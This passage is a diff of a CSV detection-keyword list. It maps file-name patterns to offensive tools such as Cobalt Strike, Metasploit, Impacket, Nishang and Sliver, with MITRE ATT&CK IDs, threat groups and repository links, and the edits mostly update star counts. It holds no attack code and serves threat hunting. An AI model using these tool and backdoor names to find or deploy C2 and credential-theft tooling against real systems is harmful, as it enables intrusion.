TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*http_owa_common.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*http_stager_client_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_server_append*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_server_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_server_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_uri_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_uri_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_ntlmrelay.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_owa_common.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_stager_client_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_append*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_uri_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_uri_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http1.x64.bin*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*http1.x64.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*HTTPAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*httpattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*httpattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*httpattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*httpattack.py*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*httpattack.py*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" -"*httpattacks/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*HTTP-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*http-c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*httpattacks/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*HTTP-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*http-c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*HttpEvilClippyController*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for 